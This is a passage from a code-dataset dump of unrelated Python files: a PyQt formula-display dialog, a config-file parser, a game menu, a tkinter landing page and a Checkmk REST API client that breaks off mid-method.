] | null | null | null | fbp_calculator/dialogfbp.py | deselmo/FBP_Calculator | 90bb07f123fea224fdca24aabeceabd391b7d51e | [
"MIT"
] | null | null | null | fbp_calculator/dialogfbp.py | deselmo/FBP_Calculator | 90bb07f123fea224fdca24aabeceabd391b7d51e | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import re
import xlsxwriter
from PyQt5 import QtCore, QtGui, QtWidgets
from fbp_calculator.ui_dialogfbp import Ui_DialogFBP
from fbp_calculator.calculatorfbp import QThreadCalculatorFBP
from fbp_calculator.reaction_adapter import reaction_invadapter
class DialogFBP(QtWidgets.QDialog, Ui_DialogFBP):
def __init__(self, parent,
symbols, steps, reaction_set, context_given_set, context_not_given_set):
super(DialogFBP, self).__init__(parent)
self.setupUi(self)
self.setAttribute(QtCore.Qt.WA_DeleteOnClose)
self.formulaType_defaultIndex = 1
self.comboBoxFormulaType.setCurrentIndex(self.formulaType_defaultIndex)
self.textBrowserFormula.setVisible(self.formulaType_defaultIndex == 0)
self.listFormula.setVisible(self.formulaType_defaultIndex == 1)
self.tableWidgetFormula.setVisible(self.formulaType_defaultIndex == 2)
self.symbols = symbols
self.steps = steps
self.reaction_set = reaction_set
self.context_given_set = context_given_set
self.context_not_given_set = context_not_given_set
self.lineEditSymbols.setText(reaction_invadapter(self.symbols))
self.lineEditSteps.setText(str(self.steps))
self.labelLoadingImage.setMovie(QtGui.QMovie(":/loader.gif"))
self.labelLoadingImage.movie().start()
self.toolButtonSave.setVisible(False)
self.toolButtonSave.clicked.connect(self.toolButtonSave_clicked)
self.comboBoxFormulaType.currentIndexChanged.connect(self.comboBoxFormulaType_currentIndexChanged)
self.listFormula.verticalScrollBar().valueChanged.connect(self.listFormula_scrollBar_valueChanged)
self.tableWidgetFormula.horizontalScrollBar().valueChanged.connect(self.tableWidgetFormula_horizontalScrollBar_valueChanged)
self.tableWidgetFormula.verticalScrollBar().valueChanged.connect(self.tableWidgetFormula_verticalScrollBar_valueChanged)
self.QThreadCalculatorFBP = QThreadCalculatorFBP(self)
self.QThreadCalculatorFBP.finished.connect(self.QThread_finishedCalculatorFBP)
self.QThreadCalculatorFBP.start()
def toolButtonSave_clicked(self):
formulaType_index = self.comboBoxFormulaType.currentIndex()
if formulaType_index == 0:
file_name, _ = QtWidgets.QFileDialog.getSaveFileName(self,
'Save result as',
'untitled.txt',
'TXT files (*.txt)')
if not file_name:
return
try:
with open(file_name, 'w') as file:
file.write(self.save_text)
except Exception as e:
error_message = str(e)
if 'Errno' in error_message:
error_message = error_message.split('] ')[1]
QtWidgets.QMessageBox.critical(self,
'Error when saving the file',
'{}'.format(error_message),
QtWidgets.QMessageBox.Close,
QtWidgets.QMessageBox.Close)
elif formulaType_index == 1:
file_name, _ = QtWidgets.QFileDialog.getSaveFileName(self,
'Save result as',
'untitled.txt',
'TXT files (*.txt)')
if not file_name:
return
try:
with open(file_name, 'w') as file:
file.write(self.save_list)
except Exception as e:
error_message = str(e)
if 'Errno' in error_message:
error_message = error_message.split('] ')[1]
QtWidgets.QMessageBox.critical(self,
'Error when saving the file',
'{}'.format(error_message),
QtWidgets.QMessageBox.Close,
QtWidgets.QMessageBox.Close)
elif formulaType_index == 2:
file_name, _ = QtWidgets.QFileDialog.getSaveFileName(self,
'Save result as',
'untitled.xlsx',
'XLSX files (*.xlsx)')
if not file_name:
return
workbook = xlsxwriter.Workbook(file_name)
worksheet = workbook.add_worksheet()
if isinstance(self.formula, bool):
worksheet.write(0, 0, str(self.formula))
else:
for i in range(0, self.steps):
worksheet.write(0, i, str(i+1))
for i in range(0, len(self.formula_table)):
row = self.formula_table[i]
for column in row:
text = row[column]
worksheet.write(i+1, column, text)
try:
workbook.close()
except Exception as e:
error_message = str(e)
if 'Errno' in error_message:
error_message = error_message.split('] ')[1]
QtWidgets.QMessageBox.critical(self,
'Error when saving the file',
'{}'.format(error_message),
QtWidgets.QMessageBox.Close,
QtWidgets.QMessageBox.Close)
def resizeEvent(self, event):
self.listFormula_fillSpace()
self.tableWidgetFormula_fillVerticalSpace()
self.tableWidgetFormula_fillHorizontalSpace()
def closeEvent(self, event):
self.QThreadCalculatorFBP.stop()
self.QThreadCalculatorFBP.wait()
event.accept()
def QThread_finishedCalculatorFBP(self):
if self.QThreadCalculatorFBP.stopped:
return
self.labelLoadingImage.setVisible(False)
self.labelLoadingImage.movie().stop()
self.labelComputing.setVisible(False)
if not self.QThreadCalculatorFBP.result['completed']:
self.labelComputing.setStyleSheet("QLabel { color : red; font-weight:600; }")
self.labelComputing.setText('Error during the fbp calculation')
self.labelComputing.setVisible(True)
return
self.formula = self.QThreadCalculatorFBP.result['formula']
self.formula_table = self.QThreadCalculatorFBP.result['formula_table']
self.toolButtonSave.setVisible(True)
self.comboBoxFormulaType.setEnabled(True)
self.comboBoxFormulaType_currentIndexChanged(self.formulaType_defaultIndex)
self.raise_()
def comboBoxFormulaType_currentIndexChanged(self, index):
if index == 0:
self.textBrowserFormula_show()
elif index == 1:
self.listFormula_show()
elif index == 2:
self.tableWidgetFormula_show()
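# Descriptive note (inferred from the rendering code below): when self.formula
# is not a plain bool, it is treated as a disjunction of conjunctions, i.e. a
# list of clauses where each clause is a list of (step, symbol) pairs, which
# the three views render as HTML text, as list rows, or as a steps-by-rows
# table built from self.formula_table.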
def textBrowserFormula_show(self):
self.listFormula.setVisible(False)
self.tableWidgetFormula.setVisible(False)
self.textBrowserFormula.setVisible(True)
if not self.textBrowserFormula.isEnabled():
self.textBrowserFormula.setEnabled(True)
self.textBrowserFormula_initialize()
def textBrowserFormula_initialize(self):
if isinstance(self.formula, bool):
text = str(self.formula)
self.textBrowserFormula.setText(text)
self.save_text = text
return
text_subbed = ''
prebrackets = len(self.formula) > 1
for i in range(0, len(self.formula)):
if i > 0: text_subbed += ' ∨ '
backets = prebrackets and len(self.formula[i]) > 1
if backets: text_subbed += '('
for j in range(0, len(self.formula[i])):
if j > 0: text_subbed += ' ∧ '
n, s = self.formula[i][j]
text_subbed += '{}<sub>{}</sub>'.format(s, str(n))
if backets: text_subbed += ')'
self.textBrowserFormula.setText(text_subbed)
save_text = text_subbed
save_text = re.sub('<sub>', '_', save_text)
save_text = re.sub('</sub>', '', save_text)
self.save_text = save_text
def listFormula_show(self):
self.textBrowserFormula.setVisible(False)
self.tableWidgetFormula.setVisible(False)
self.listFormula.setVisible(True)
if not self.listFormula.isEnabled():
self.listFormula.setEnabled(True)
self.listFormula_initialize()
else:
self.listFormula_fillSpace()
def listFormula_initialize(self):
if isinstance(self.formula, bool):
text = str(self.formula)
self.listFormula.addItem(QtWidgets.QListWidgetItem(text))
self.save_list = text
return
text = ''
for f in self.formula:
for i in range(0, len(f)):
n, s = f[i]
text += '{}_{} '.format(s, str(n))
text = text[:-1]
text += '\r\n'
self.save_list = text
self.listFormula_fillSpace()
def listFormula_fillSpace(self):
if (not self.listFormula.isEnabled() or not self.listFormula.isVisible()
or isinstance(self.formula, bool)):
return
for _ in range(self.listFormula.count(), len(self.formula)):
if self.listFormula.verticalScrollBar().maximum() != 0:
break
self.listFormula_addRow()
def listFormula_scrollBar_valueChanged(self, value):
if (not self.listFormula.isEnabled() or not self.listFormula.isVisible()
or isinstance(self.formula, bool)):
return
listFormula_len = self.listFormula.count()
if (listFormula_len < len(self.formula) and
value == self.listFormula.verticalScrollBar().maximum()):
self.listFormula_addRow()
def listFormula_addRow(self):
f = self.formula[self.listFormula.count()]
text = ''
for i in range(0, len(f)):
n, s = f[i]
text += '{}<sub>{}</sub> '.format(s, str(n))
text = text[:-1]
label = QtWidgets.QLabel(text)
label.setContentsMargins(4,4,4,4)
item = QtWidgets.QListWidgetItem()
item.setSizeHint(QtCore.QSize(0, label.sizeHint().height()+4))
self.listFormula.addItem(item)
self.listFormula.setItemWidget(item, label)
def tableWidgetFormula_show(self):
self.textBrowserFormula.setVisible(False)
self.listFormula.setVisible(False)
self.tableWidgetFormula.setVisible(True)
if not self.tableWidgetFormula.isEnabled():
self.tableWidgetFormula.setEnabled(True)
self.tableWidgetFormula_initialize()
else:
self.tableWidgetFormula_fillVerticalSpace()
self.tableWidgetFormula_fillHorizontalSpace()
def tableWidgetFormula_initialize(self):
if isinstance(self.formula, bool):
self.tableWidgetFormula.horizontalHeader().setVisible(False)
self.tableWidgetFormula.setRowCount(1)
self.tableWidgetFormula.setColumnCount(1)
self.tableWidgetFormula_addCell(0, 0, str(self.formula))
self.tableWidgetFormula_resizeToContent()
return
self.tableWidgetFormula_fillHorizontalSpace()
self.tableWidgetFormula_fillVerticalSpace()
def tableWidgetFormula_fillVerticalSpace(self):
if (not self.tableWidgetFormula.isEnabled() or not self.tableWidgetFormula.isVisible()
or isinstance(self.formula, bool)):
return
for _ in range(self.tableWidgetFormula.rowCount(), len(self.formula_table)):
if self.tableWidgetFormula.verticalScrollBar().maximum() != 0:
break
self.tableWidgetFormula_addRow()
def tableWidgetFormula_fillHorizontalSpace(self):
if (not self.tableWidgetFormula.isEnabled() or not self.tableWidgetFormula.isVisible()
or isinstance(self.formula, bool)):
return
for _ in range(self.tableWidgetFormula.columnCount(), self.steps):
if self.tableWidgetFormula.horizontalScrollBar().maximum() != 0:
break
self.tableWidgetFormula_addColumn()
def tableWidgetFormula_verticalScrollBar_valueChanged(self, value):
if (not self.tableWidgetFormula.isEnabled() or not self.tableWidgetFormula.isVisible()
or isinstance(self.formula, bool)):
return
if (self.tableWidgetFormula.rowCount() < len(self.formula_table) and
value == self.tableWidgetFormula.verticalScrollBar().maximum()):
self.tableWidgetFormula_addRow()
def tableWidgetFormula_horizontalScrollBar_valueChanged(self, value):
if (not self.tableWidgetFormula.isEnabled()) or isinstance(self.formula, bool):
return
if (self.tableWidgetFormula.columnCount() < self.steps and
value == self.tableWidgetFormula.horizontalScrollBar().maximum()):
self.tableWidgetFormula_addColumn()
def tableWidgetFormula_addRow(self):
column = self.tableWidgetFormula.columnCount()
row = self.tableWidgetFormula.rowCount()
self.tableWidgetFormula.setRowCount(row+1)
f = self.formula_table[row]
for i in range(0, column):
if not i in f: continue
s = f[i]
self.tableWidgetFormula_addCell(row, i, s)
self.tableWidgetFormula_resizeToContent()
def tableWidgetFormula_addColumn(self):
column = self.tableWidgetFormula.columnCount()
row = self.tableWidgetFormula.rowCount()
self.tableWidgetFormula.setColumnCount(column+1)
self.tableWidgetFormula.setHorizontalHeaderItem(column, QtWidgets.QTableWidgetItem(str(column+1)))
for i in range(0, row):
f = self.formula_table[i]
if not column in f: continue
s = f[column]
self.tableWidgetFormula_addCell(i, column, s)
self.tableWidgetFormula_resizeToContent()
def tableWidgetFormula_addCell(self, row, column, text):
cellWidget = self.tableWidgetFormula.cellWidget(row, column)
if cellWidget == None:
label = QtWidgets.QLabel(text)
label.setContentsMargins(8,2,8,2)
label.setAlignment(QtCore.Qt.AlignLeft)
self.tableWidgetFormula.setCellWidget(row, column, label)
else:
raise Exception('Cell was added more than once')
def tableWidgetFormula_resizeToContent(self):
self.tableWidgetFormula.horizontalHeader().setResizeContentsPrecision(self.tableWidgetFormula.rowCount())
self.tableWidgetFormula.resizeColumnsToContents()
self.tableWidgetFormula.horizontalHeader().setSectionResizeMode(QtWidgets.QHeaderView.Fixed)
| 39.007874 | 132 | 0.621922 | 1,391 | 14,862 | 6.524083 | 0.149533 | 0.14303 | 0.023141 | 0.027548 | 0.436143 | 0.345565 | 0.307769 | 0.24022 | 0.24022 | 0.216749 | 0 | 0.00536 | 0.284484 | 14,862 | 380 | 133 | 39.110526 | 0.847847 | 0.001413 | 0 | 0.403974 | 0 | 0 | 0.029786 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076159 | false | 0 | 0.019868 | 0 | 0.145695 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a8788321cfe29c5b65aa0dcb3161af6d1defc792 | 3,721 | py | Python | spts/config.py | FilipeMaia/spts | de4eb2920b675537da611c7301d4d5a9565a1ab1 | [
"BSD-2-Clause"
] | null | null | null | spts/config.py | FilipeMaia/spts | de4eb2920b675537da611c7301d4d5a9565a1ab1 | [
"BSD-2-Clause"
] | 5 | 2021-03-26T11:37:40.000Z | 2021-03-31T09:20:40.000Z | spts/config.py | FilipeMaia/spts | de4eb2920b675537da611c7301d4d5a9565a1ab1 | [
"BSD-2-Clause"
] | 1 | 2021-03-24T11:07:41.000Z | 2021-03-24T11:07:41.000Z | import os, numpy, configparser
import logging
logger = logging.getLogger(__name__)
import spts.log
from spts.log import log_and_raise_error,log_warning,log_info,log_debug
def read_configfile(configfile):
"""
Read configuration file to dictionary
"""
config = configparser.ConfigParser()
with open(configfile,"r") as f:
config.read_file(f)
confDict = {}
for section in config.sections():
confDict[section] = {}
c = config.items(section)
for (key,value) in c:
confDict[section][key] = _estimate_class(value)
return confDict
def write_configfile(configdict, filename):
"""
Write configuration file from a dictionary
"""
ls = ["# Configuration file\n# Automatically written by Configuration instance\n\n"]
for section_name,section in configdict.items():
if isinstance(section,dict):
ls.append("[%s]\n" % section_name)
for variable_name,variable in section.items():
if (hasattr(variable, '__len__') and (not isinstance(variable, str))) or isinstance(variable, list):
ls.append("%s=%s\n" % (variable_name,_list_to_str(variable)))
else:
ls.append("%s=%s\n" % (variable_name,str(variable)))
ls.append("\n")
with open(filename, "w") as f:
f.writelines(ls)
def read_configdict(configdict):
C = {}
for k,v in configdict.items():
if isinstance(v, dict):
v_new = read_configdict(v)
else:
v_new = _estimate_class(v)
C[k] = v_new
return C
def _estimate_class(var):
v = _estimate_type(var)
if isinstance(v,str):
v = v.replace(" ","")
if v.startswith("[") and v.endswith("]"):
v = _str_to_list(v)
for i in range(len(v)):
v[i] = os.path.expandvars(v[i]) if isinstance(v[i], str) else v[i]
elif v.startswith("{") and v.endswith("}"):
v = v[1:-1].split(",")
v = [w for w in v if len(w) > 0]
d = {}
for w in v:
key,value = w.split(":")
value = _estimate_type(value)
if value.startswith("$"):
value = os.path.expandvars(value)
d[key] = value
v = d
else:
if v.startswith("$"):
v = os.path.expandvars(v)
return v
def _estimate_type(var):
if not isinstance(var, str):
return var
#first test bools
if var.lower() == 'true':
return True
elif var.lower() == 'false':
return False
elif var.lower() == 'none':
return None
else:
#int
try:
return int(var)
except ValueError:
pass
#float
try:
return float(var)
except ValueError:
pass
#string
try:
return str(var)
except ValueError:
raise NameError('Something messed up autocasting var %s (%s)' % (var, type(var)))
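# Worked examples (sketch): strings read from the config file are coerced to
# Python types in order bool, None, int, float, then left as str.
# _estimate_type('true') -> True
# _estimate_type('42') -> 42
# _estimate_type('3.14') -> 3.14
# _estimate_type('hello') -> 'hello'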
def _str_to_list(s):
if s.startswith("[") and s.endswith("]"):
if s[1:-1].startswith("[") and s[1:-1].endswith("]"):
return _str_to_list(s[1:-1])
else:
l = s[1:-1].split(",")
l = [_estimate_type(w) for w in l if len(w) > 0]
return l
else:
return s
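# Worked example (sketch): _str_to_list('[1,2.5,abc]') -> [1, 2.5, 'abc']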
def _list_to_str(L):
if (hasattr(L, '__len__') and (not isinstance(L, str))) or isinstance(L, list):
s = ""
for l in L:
s += _list_to_str(l)
s += ","
s = "[" + s[:-1] + "]"
return s
else:
return str(L)
| 30.252033 | 116 | 0.520828 | 459 | 3,721 | 4.087146 | 0.228758 | 0.00533 | 0.006397 | 0.020256 | 0.081023 | 0.050107 | 0.02452 | 0 | 0 | 0 | 0 | 0.005343 | 0.346144 | 3,721 | 122 | 117 | 30.5 | 0.765721 | 0.029831 | 0 | 0.165049 | 0 | 0 | 0.052013 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.067961 | false | 0.019417 | 0.038835 | 0 | 0.252427 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a8789fe72bc8cc557e2a565c965147972faca923 | 556 | py | Python | Jogos/jogos.py | jbauermanncode/Alura | be3fe9b717f3f7fe54262f3129076e7736be61a6 | [
"MIT"
] | null | null | null | Jogos/jogos.py | jbauermanncode/Alura | be3fe9b717f3f7fe54262f3129076e7736be61a6 | [
"MIT"
] | null | null | null | Jogos/jogos.py | jbauermanncode/Alura | be3fe9b717f3f7fe54262f3129076e7736be61a6 | [
"MIT"
] | null | null | null | #Importar forca e adivinhacao
import forca
import adivinhacao
def escolhe_jogo():
    print('*'*25)
    print('***Escolha o seu jogo!***')
    print('*'*25)
    print('(1) Forca (2) Adivinhação')
    jogo = int(input('Digite 1 ou 2 para escolher um jogo: '))
    if(jogo == 1):
        print('Jogo da Forca')
        #Call the jogar function from the forca module
        forca.jogar()
    elif(jogo == 2):
        print('Jogo de Adivinhação')
        adivinhacao.jogar()
# Run escolhe_jogo only when this file is executed directly, not when imported
if(__name__=='__main__'):
    escolhe_jogo()
| 19.172414 | 62 | 0.600719 | 73 | 556 | 4.438356 | 0.506849 | 0.067901 | 0.067901 | 0.098765 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.024272 | 0.258993 | 556 | 28 | 63 | 19.857143 | 0.762136 | 0.179856 | 0 | 0.125 | 0 | 0 | 0.287305 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.125 | 0 | 0.1875 | 0.375 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a879073ae93c60365cc903909e15d337b82c7959 | 2,153 | py | Python | STIMB Landing Page.py | ksu-hmi/STIMythBuster | 4cf5c7456d043a9a251f3d3f3c66b4e3a17241fb | [
"MIT"
] | 1 | 2021-11-05T01:57:43.000Z | 2021-11-05T01:57:43.000Z | STIMB Landing Page.py | ksu-hmi/STIMythBuster | 4cf5c7456d043a9a251f3d3f3c66b4e3a17241fb | [
"MIT"
] | null | null | null | STIMB Landing Page.py | ksu-hmi/STIMythBuster | 4cf5c7456d043a9a251f3d3f3c66b4e3a17241fb | [
"MIT"
] | 2 | 2021-11-18T01:17:33.000Z | 2021-11-18T01:22:09.000Z | #import libraries
import tkinter as tk
from tkinter import *
from PIL import ImageTk, Image
#beginning of code
root = tk.Tk()
root.title("STIMythBusters Interactive Application")
canvas = tk.Canvas(root, bg="purple", width=600, height=400)
canvas.grid(columnspan=4, rowspan=4)
canvas2 = tk.Canvas(root, bg="purple", width=600, height=400)
canvas2.grid(columnspan=4, rowspan=4)
frame = tk.Canvas(root, bg="blue", width=600, height=400)
frame.place(x=20, y=20)
#Open logo
load = Image.open("logo.png")
render = ImageTk.PhotoImage(load)
#Then associate it with the label:
img = tk.Label(canvas, image=render)
img.image = render
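# Keeping this extra reference on the widget stops Python from
# garbage-collecting the PhotoImage, which would otherwise blank the logo.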
img.place(x=20, y=20)
#instrutions - Landing Page
instructions = tk.Label(root, text="Welcome to STIMythBusters", font="Raleway", bg="brown", fg="white")
instructions.grid(columnspan=4, column=0, row=0)
def open_file():
    browser_text.set("loading....")
    canvas2 = tk.Canvas(root, bg="purple", width=600, height=400)
    canvas2.grid(columnspan=4, rowspan=4)
#button = tk.Button(canvas2, text="new window",command=lambda:open_file(), bg='black', fg='#469A00', )
#button.grid(column=1, row=2)
#create button that will be placed on canvas2
browser_text2 = tk.StringVar()
browse_btn= tk.Button(canvas2, textvariable=browser_text2, command=lambda:open_file(), font="Raleway", bg="green", fg="white", height=2, width=15)
browser_text2.set("LEARN MORE")
browse_btn.grid(column=1, row=2)
#browser button 1
browser_text = tk.StringVar()
browse_btn= tk.Button(root, textvariable=browser_text, command=lambda:open_file(), font="Raleway", bg="green", fg="white", height=2, width=15)
browser_text.set("SearchbySTI")
browse_btn.grid(column=1, row=2)
def open_button():
    browse_text.set("loading....")
    canvas2 = tk.Canvas(root, bg="purple", width=600, height=400)
    canvas2.grid(columnspan=4, rowspan=4)
#browse button 2
browse_text = tk.StringVar()
browse_btn= tk.Button(root, textvariable=browse_text, command=lambda:open_button(), font="Raleway", bg="green", fg="white", height=2, width=15)
browse_text.set("SearchbySymptoms")
browse_btn.grid(column=2, row=2)
#ending of code
root.mainloop()
| 29.493151 | 146 | 0.726893 | 328 | 2,153 | 4.70122 | 0.292683 | 0.035019 | 0.045396 | 0.055123 | 0.424773 | 0.40013 | 0.381971 | 0.350843 | 0.350843 | 0.264591 | 0 | 0.045455 | 0.111008 | 2,153 | 72 | 147 | 29.902778 | 0.760188 | 0.147701 | 0 | 0.179487 | 0 | 0 | 0.124108 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.051282 | false | 0 | 0.076923 | 0 | 0.128205 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a87b11324a134f84f44e6e28a4f413d36cb0e485 | 40,710 | py | Python | Checkmk.py | bpoje/checkmk-python-rest-api | 78d13dbdf9f0c6bb1db7d8a80db030d212406647 | [
"MIT"
] | null | null | null | Checkmk.py | bpoje/checkmk-python-rest-api | 78d13dbdf9f0c6bb1db7d8a80db030d212406647 | [
"MIT"
] | null | null | null | Checkmk.py | bpoje/checkmk-python-rest-api | 78d13dbdf9f0c6bb1db7d8a80db030d212406647 | [
"MIT"
] | null | null | null | from multiprocessing.sharedctypes import Value
import requests as req
import json as js
from Folder import Folder
from Host import *
from Changes import *
from Discover import *
from Create import *
from Delete import *
from Update import *
from GetAllFolders import *
class Checkmk:
def __init__(self, url, ca_cert, bearerAuth, site_name):
self.url = url
self.ca_cert = ca_cert
self.username = bearerAuth[0]
self.secret = bearerAuth[1]
self.site_name = site_name
self.create_session()
#Python3 switch
#self.swx={
# 200 : 'HTTP 200 OK',
# 400 : 'HTTP 400 Bad Request',
# 401 : 'HTTP 401 Unauthorized',
# 403 : 'HTTP Forbidden',
# 404 : 'HTTP Not Found',
# 500 : 'HTTP Internal Server Error'
#}
#Python3 switch
#status_code_string = self.swx.get(res.status_code, 'HTTP response string not found in switch')
#print(f'swx: {status_code_string}')
def server_url(self):
return self.url
def ca_cert(self):
return self.ca_cert
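# Descriptive note: the instance attribute self.ca_cert assigned in __init__
# shadows this method on instances, so self.ca_cert evaluates to the CA path
# string (as the requests calls below expect) rather than to this callable.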
def create_session(self):
# https://docs.checkmk.com/latest/en/rest_api.html
# The REST-API supports the following methods for authentication: Bearer, Web server and Cookie
#
# Bearer or Header authentication:
# 'Bearer' means the holder of an identity. With HTTP bearer authentication, the client authenticates itself
# with the access data of a user set up on the Checkmk server. Ideally, this is the so-called automation user,
# which is provided in Checkmk for the execution of actions via an API. Bearer authentication is recommended for use in scripts.
#
# For authentication, you need the user name and the corresponding so-called "automation secret for machine accounts",
# i.e. the password for the automation user.
#
# Both items of information must be transmitted to the Checkmk server in the header of each request.
#
# In a newly-created site, the user automation will have already been created. You can find it, like other users,
# under Setup > Users. Make sure that the roles and associated permissions for the automation user are set to allow you to execute your requests.
# Create requests session object
self.s = req.Session()
self.s.headers.update({'Authorization':f'Bearer {self.username} {self.secret}', 'accept':'application/json', 'Content-Type':'application/json' })
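    # For illustration only: with hypothetical credentials ('automation',
    # 'mysecret123'), the session built above sends on every request:
    #   Authorization: Bearer automation mysecret123
    #   accept: application/json
    #   Content-Type: application/json
    # exec() below prepares each request against this session, so all calls
    # inherit these headers unless explicitly overridden.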
def exec(self,url_action,req_type='GET',data=None,header=None,send=True,display_req=False,display_res=True):
#Create request
#r = req.Request('GET', cmk_rest_url + '/objects/host_config/dc-repo?effective_attributes=true')
r = req.Request(req_type, self.url + url_action, data=data)
#Prepare request based on existing session (adds headers & stuff that are defined under connection)
sr = self.s.prepare_request(r)
#Modify this header
if (header != None):
sr.headers.update(header)
        #Output prepared request:
if (display_req == True):
print('Prepared request:')
print('\tURL: ', end='')
print(sr.url)
print('\tBODY: ', end='')
print(sr.body)
print('\tHEADERS: ', end='')
print(sr.headers)
print()
#Send
res = None
if (send == True):
res = self.s.send(sr, verify=self.ca_cert)
#Output response
        #Guard against res being None when send=False
        if (display_res == True and res is not None):
print('Response:')
print(f'\tStatus code: {res.status_code} {req.status_codes._codes[res.status_code][0]}')
print()
#If data not empty
print('\tRESPONSE BODY: ', end='')
if (res.content != None and len(res.content) != 0):
#res.content are bytes, decode them to produce string
dmp = js.loads(res.content.decode('utf-8'))
#Beautifying JSON output
print(js.dumps(dmp, indent=4))
print()
else:
print('No returned data')
print('\tRESPONSE HEADERS: ', end='')
print(res.headers)
return res
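    # Usage sketch for exec() (endpoint and host name are hypothetical; assumes
    # a reachable Checkmk REST API behind self.url):
    #   res = cmk.exec('/objects/host_config/myhost', req_type='GET',
    #                  display_req=True, display_res=True)
    #   if res is not None and res.status_code == 200:
    #       payload = js.loads(res.content.decode('utf-8'))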
#Show all hosts (GET)
def host_get_all(self,send=True,display_req=False,display_res=False):
res = self.exec('/domain-types/host_config/collections/all',send=send,display_req=display_req,display_res=display_res)
if (res == None):
print('Response is None')
else:
# HTTP 200 OK
if (res.status_code == 200):
#res.content are bytes, decode them to produce string
cont = res.content.decode('utf-8')
dmp = js.loads(cont)
values = dmp['value']
hosts = []
for i in values:
id = i['id']
host = Host(id)
host.set_using_json(i)
hosts.append(host)
return hosts
else:
print('\n##################################')
print('FAILED HTTP response is not 200 OK')
print('##################################\n')
return None
#Show a host (GET)
#effective_attributes - Show all effective attributes, which affect this host, not just the attributes which were set on this host specifically. This includes all attributes of all of this host's parent folders.
def host_get(self,host_name,effective_attributes=False,send=True,display_req=False,display_res=False):
option1 = ''
if (effective_attributes == True):
option1 = '?effective_attributes=true'
res = self.exec(f'/objects/host_config/{host_name}{option1}',send=send,display_req=display_req,display_res=display_res)
if (res == None):
print('Response is None')
else:
# HTTP 200 OK
if (res.status_code == 200):
#res.content are bytes, decode them to produce string
cont = res.content.decode('utf-8')
json_dmp = js.loads(cont)
etag = res.headers['ETag']
host = Host(host_name)
host.set_using_json(json_dmp)
return (host, etag)
return None
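    # Usage sketch (hypothetical host name; assumes a configured Checkmk site):
    #   result = cmk.host_get('myhost', effective_attributes=True)
    #   if result is not None:
    #       host, etag = result   # keep the ETag for later If-Match updates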
#GET /domain-types/folder_config/collections/all Show all folders
#Lists subfolders (and the hosts in subfolders) of folder x. It won't show the files that are in folder x.
#
#Get all folders in a folder (can show hosts in folder and work recursively)
#parent string - Show all sub-folders of this folder. The default is the root-folder. Path delimiters can be either ~, / or \. Please use the one most appropriate for your quoting/escaping needs. A good default choice is ~.
#recursive boolean - List the folder (default: root) and all its sub-folders recursively.
#show_hosts boolean - When set, all hosts that are stored in each folder will also be shown. On large setups this may come at a performance cost, so by default this is switched off.
def get_all_folders(self,parent,recursive=False,show_hosts=False,send=True,display_req=False,display_res=False):
if (parent == None):
raise ValueError('parent cannot be none')
parent_str = f'parent={parent}'
if (recursive == True):
recursive_str = 'recursive=true'
else:
recursive_str = 'recursive=false'
if (show_hosts == True):
show_hosts_str = 'show_hosts=true'
else:
show_hosts_str = 'show_hosts=false'
#/domain-types/folder_config/collections/all?parent=~&recursive=false&show_hosts=false
res = self.exec(f'/domain-types/folder_config/collections/all?{parent_str}&{recursive_str}&{show_hosts_str}',send=send,display_req=display_req,display_res=display_res)
if (res == None):
print('Response is None')
else:
# HTTP 200 OK
if (res.status_code == 200):
#res.content are bytes, decode them to produce string
cont = res.content.decode('utf-8')
json_dmp = js.loads(cont)
id = json_dmp['id']
domainType = json_dmp['domainType']
value = json_dmp['value']
response_header = res.headers
folders = []
for i in value:
value_id = i['id']
value_title = i['title']
value_domain_type = i['domainType']
value_extensions = i['extensions']
value_path = value_extensions['path']
value_attributes = value_extensions['attributes']
value_meta_data = value_attributes['meta_data']
value_created_at = value_meta_data['created_at']
value_updated_at = value_meta_data['updated_at']
value_created_by = value_meta_data['created_by']
hosts_in_folder = None
value_members = i['members']
if ('hosts' in value_members):
value_members_hosts = value_members['hosts']
if ('value' in value_members_hosts):
value_members_hosts_value = value_members_hosts['value']
hosts_in_folder = []
for j in value_members_hosts_value:
host_title = j['title']
hosts_in_folder.append(host_title)
                    #The first Folder(...) call here was dead code: it was immediately
                    #overwritten and omitted hosts_in_folder; only this call is needed.
                    folder = Folder(value_id, value_title, value_domain_type, value_path, hosts_in_folder, value_created_at, value_updated_at, value_created_by)
folders.append(folder)
ok = GetAllFolders_ok(response_header, id, domainType, folders)
return GetAllFolders(res.status_code, ok)
else:
#res.content are bytes, decode them to produce string
cont = res.content.decode('utf-8')
json_dmp = js.loads(cont)
title = json_dmp['title']
status = json_dmp['status']
detail = json_dmp['detail']
fields = json_dmp['fields']
response_header = res.headers
fail = GetAllFolders_fail(title,response_header,status,detail,fields)
return GetAllFolders(res.status_code, fail)
return None
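    # Usage sketch (~ denotes the root folder; the reply.ok.folders access
    # assumes the GetAllFolders/GetAllFolders_ok wrappers expose their
    # constructor fields, which is not shown in this file):
    #   reply = cmk.get_all_folders('~', recursive=True, show_hosts=True)
    #   if reply is not None and reply.status_code == 200:
    #       for folder in reply.ok.folders:
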